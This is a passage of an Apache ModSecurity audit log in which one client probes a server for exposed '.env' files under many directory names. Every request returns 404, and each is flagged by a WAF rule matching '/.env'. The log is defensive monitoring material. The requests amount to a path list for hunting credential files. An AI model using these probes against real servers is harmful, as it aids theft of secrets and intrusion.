"/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/app/config/.env"] [unique_id "aE6xdxRnvL96XFagPFC5kgAAAAY"] Stopwatch: 1749987703130090 3331 (- - -) Stopwatch2: 1749987703130090 3331; combined=2037, p1=430, p2=1504, p3=27, p4=26, p5=50, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a2065a63-Z-- --0aa68157-A-- [15/Jun/2025:17:11:43.263871 +0530] aE6xd1u1-lKBbvo2E9pCWQAAAAw 91.232.140.197 34418 127.0.0.1 7080 --0aa68157-B-- GET /staging/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --0aa68157-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0aa68157-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/staging/.env"] [unique_id "aE6xd1u1-lKBbvo2E9pCWQAAAAw"] Stopwatch: 1749987703260979 2948 (- - -) Stopwatch2: 1749987703260979 2948; combined=1852, p1=349, p2=1402, p3=27, p4=25, p5=48, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0aa68157-Z-- --e80c0c47-A-- [15/Jun/2025:17:11:43.394498 +0530] aE6xdw2U8ofTdsKp_yhLmwAAAAU 91.232.140.197 34420 127.0.0.1 7080 --e80c0c47-B-- GET /admin-app/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --e80c0c47-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e80c0c47-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin-app/.env"] [unique_id "aE6xdw2U8ofTdsKp_yhLmwAAAAU"] Stopwatch: 1749987703391403 3146 (- - -) Stopwatch2: 1749987703391403 3146; combined=1912, p1=388, p2=1420, p3=26, p4=23, p5=55, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e80c0c47-Z-- --01c9e82e-A-- [15/Jun/2025:17:11:43.525041 +0530] aE6xd3rzia-Xuz8LZxRKzgAAAAg 91.232.140.197 34422 127.0.0.1 7080 --01c9e82e-B-- GET /api/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --01c9e82e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --01c9e82e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api/.env"] [unique_id "aE6xd3rzia-Xuz8LZxRKzgAAAAg"] Stopwatch: 1749987703521901 3206 (- - -) Stopwatch2: 1749987703521901 3206; combined=1983, p1=392, p2=1489, p3=26, p4=26, p5=49, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01c9e82e-Z-- --20aa3345-A-- [15/Jun/2025:17:11:43.655401 +0530] aE6xdw9BijgXpeeI_r_AUAAAAAE 91.232.140.197 34430 127.0.0.1 7080 --20aa3345-B-- GET /app/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --20aa3345-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --20aa3345-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/app/.env"] [unique_id "aE6xdw9BijgXpeeI_r_AUAAAAAE"] Stopwatch: 1749987703652615 2844 (- - -) Stopwatch2: 1749987703652615 2844; combined=1671, p1=379, p2=1198, p3=24, p4=21, p5=49, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --20aa3345-Z-- --852f8b5a-A-- [15/Jun/2025:17:11:43.786110 +0530] aE6xd197WYuiWZZK24X5XQAAAAI 91.232.140.197 34440 127.0.0.1 7080 --852f8b5a-B-- GET /apps/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --852f8b5a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --852f8b5a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/apps/.env"] [unique_id "aE6xd197WYuiWZZK24X5XQAAAAI"] Stopwatch: 1749987703783045 3131 (- - -) Stopwatch2: 1749987703783045 3131; combined=1881, p1=395, p2=1388, p3=25, p4=26, p5=47, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --852f8b5a-Z-- --feda1764-A-- [15/Jun/2025:17:11:43.917371 +0530] aE6xdxRnvL96XFagPFC5kwAAAAY 91.232.140.197 34454 127.0.0.1 7080 --feda1764-B-- GET /back/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --feda1764-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --feda1764-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/back/.env"] [unique_id "aE6xdxRnvL96XFagPFC5kwAAAAY"] Stopwatch: 1749987703913754 3697 (- - -) Stopwatch2: 1749987703913754 3697; combined=2269, p1=486, p2=1651, p3=36, p4=32, p5=64, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --feda1764-Z-- --a36a7e10-A-- [15/Jun/2025:17:11:44.048700 +0530] aE6xeA2U8ofTdsKp_yhLnAAAAAU 91.232.140.197 34460 127.0.0.1 7080 --a36a7e10-B-- GET /core/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --a36a7e10-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a36a7e10-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.env"] [unique_id "aE6xeA2U8ofTdsKp_yhLnAAAAAU"] Stopwatch: 1749987704045386 3372 (- - -) Stopwatch2: 1749987704045386 3372; combined=2051, p1=445, p2=1501, p3=28, p4=25, p5=51, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a36a7e10-Z-- --6d600152-A-- [15/Jun/2025:17:11:44.179201 +0530] aE6xeFWckDejtnB0cwJY0QAAAAA 91.232.140.197 34470 127.0.0.1 7080 --6d600152-B-- GET /cp/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --6d600152-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d600152-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/cp/.env"] [unique_id "aE6xeFWckDejtnB0cwJY0QAAAAA"] Stopwatch: 1749987704176299 2959 (- - -) Stopwatch2: 1749987704176299 2959; combined=1713, p1=388, p2=1214, p3=24, p4=32, p5=55, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6d600152-Z-- --f58dd567-A-- [15/Jun/2025:17:11:44.310734 +0530] aE6xeHrzia-Xuz8LZxRKzwAAAAg 91.232.140.197 34482 127.0.0.1 7080 --f58dd567-B-- GET /development/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --f58dd567-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f58dd567-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/development/.env"] [unique_id "aE6xeHrzia-Xuz8LZxRKzwAAAAg"] Stopwatch: 1749987704307271 3520 (- - -) Stopwatch2: 1749987704307271 3520; combined=2104, p1=489, p2=1503, p3=27, p4=27, p5=58, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f58dd567-Z-- --408a3c7e-A-- [15/Jun/2025:17:11:44.441476 +0530] aE6xeFCip1xXG9qkRMduSQAAAAc 91.232.140.197 34494 127.0.0.1 7080 --408a3c7e-B-- GET /docker/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --408a3c7e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --408a3c7e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/docker/.env"] [unique_id "aE6xeFCip1xXG9qkRMduSQAAAAc"] Stopwatch: 1749987704438254 3278 (- - -) Stopwatch2: 1749987704438254 3278; combined=1978, p1=394, p2=1476, p3=28, p4=25, p5=55, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --408a3c7e-Z-- --4cfa4344-A-- [15/Jun/2025:17:11:44.572292 +0530] aE6xeF97WYuiWZZK24X5XgAAAAI 91.232.140.197 34496 127.0.0.1 7080 --4cfa4344-B-- GET /fedex/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4cfa4344-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cfa4344-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/fedex/.env"] [unique_id "aE6xeF97WYuiWZZK24X5XgAAAAI"] Stopwatch: 1749987704568720 3640 (- - -) Stopwatch2: 1749987704568720 3640; combined=2318, p1=402, p2=1804, p3=31, p4=26, p5=55, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4cfa4344-Z-- --7b7c9810-A-- [15/Jun/2025:17:11:44.702633 +0530] aE6xeBRnvL96XFagPFC5lAAAAAY 91.232.140.197 34504 127.0.0.1 7080 --7b7c9810-B-- GET /local/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --7b7c9810-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b7c9810-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/local/.env"] [unique_id "aE6xeBRnvL96XFagPFC5lAAAAAY"] Stopwatch: 1749987704699721 2968 (- - -) Stopwatch2: 1749987704699721 2968; combined=1721, p1=383, p2=1242, p3=25, p4=23, p5=48, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b7c9810-Z-- --9d94db0c-A-- [15/Jun/2025:17:11:44.833168 +0530] aE6xeA2U8ofTdsKp_yhLnQAAAAU 91.232.140.197 34518 127.0.0.1 7080 --9d94db0c-B-- GET /private/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --9d94db0c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d94db0c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/private/.env"] [unique_id "aE6xeA2U8ofTdsKp_yhLnQAAAAU"] Stopwatch: 1749987704830240 2985 (- - -) Stopwatch2: 1749987704830240 2985; combined=1749, p1=383, p2=1262, p3=26, p4=24, p5=54, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9d94db0c-Z-- --f6ee1414-A-- [15/Jun/2025:17:11:44.963324 +0530] aE6xeHrzia-Xuz8LZxRK0AAAAAg 91.232.140.197 34528 127.0.0.1 7080 --f6ee1414-B-- GET /rest/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --f6ee1414-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6ee1414-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/rest/.env"] [unique_id "aE6xeHrzia-Xuz8LZxRK0AAAAAg"] Stopwatch: 1749987704960620 2760 (- - -) Stopwatch2: 1749987704960620 2760; combined=1602, p1=285, p2=1224, p3=24, p4=23, p5=46, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6ee1414-Z-- --7253d814-A-- [15/Jun/2025:17:11:45.093551 +0530] aE6xeVCip1xXG9qkRMduSgAAAAc 91.232.140.197 34536 127.0.0.1 7080 --7253d814-B-- GET /shared/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --7253d814-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7253d814-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/shared/.env"] [unique_id "aE6xeVCip1xXG9qkRMduSgAAAAc"] Stopwatch: 1749987705090661 2947 (- - -) Stopwatch2: 1749987705090661 2947; combined=1826, p1=349, p2=1376, p3=25, p4=25, p5=50, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7253d814-Z-- --31744400-A-- [15/Jun/2025:17:11:45.224056 +0530] aE6xeVirsA1ruSKrNWSVxAAAAAQ 91.232.140.197 34542 127.0.0.1 7080 --31744400-B-- GET /sources/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --31744400-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --31744400-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/sources/.env"] [unique_id "aE6xeVirsA1ruSKrNWSVxAAAAAQ"] Stopwatch: 1749987705221252 2872 (- - -) Stopwatch2: 1749987705221252 2872; combined=1694, p1=388, p2=1210, p3=23, p4=25, p5=48, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --31744400-Z-- --57ff9412-A-- [15/Jun/2025:17:11:45.354309 +0530] aE6xeRRnvL96XFagPFC5lQAAAAY 91.232.140.197 34550 127.0.0.1 7080 --57ff9412-B-- GET /system/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 91.232.140.197 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: 